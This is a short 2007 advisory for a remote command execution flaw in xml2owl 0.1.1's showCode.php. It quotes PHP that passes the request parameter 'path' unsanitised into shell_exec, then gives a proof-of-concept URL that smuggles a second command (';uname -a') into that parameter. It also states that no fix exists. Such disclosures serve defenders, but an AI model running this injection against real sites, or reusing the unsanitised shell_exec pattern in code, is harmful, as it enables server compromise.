xml2owl 0.1.1 showCode.php Remote Command Execution Vulnerability

2007-12-28 00:00:00

---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

Remote Command Execution

---------------------------------------------------------------

# Author: MhZ91
# Title: xml2owl-0.1.1 - Remote Command Execution
# Download: http://surfnet.dl.sourceforge.net/sourceforge/xml2owl/xml2owl-0.1.1.tar.bz2
# Bug: Remote Command Execution
# Info: Up to now, most ontologies are created manually, which is very time-expensive. The goal is it, to produce ontologies automatically via XSLT, which fit as good as possible to a given XML-file resp. XML-Schema-file
# Visit: http://www.inj3ct-it.org

---------------------------------------------------------------

In the file showCode.php there is this...

<?
$xml2html = "xsl/xmlverbatim.xsl";
$path = $_REQUEST['path']; <-

if(class_exists('XSLTProcessor')) {
$xsl = new XSLTProcessor();

$res = DOMDocument::load($path);

$xsl->importStylesheet(DOMDocument::load($xml2html));
echo $xsl->transformToXML($res);
}
else {
$exec_string = "xsltproc " . $xml2html . " " . $path; <-
echo shell_exec($exec_string); <-
}
?>

We can modify the $path variable.. and give a remote command execution by the function shell_exec..

Type http://www.site.com/showCode.php?path=;uname -a

...

---------------------------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.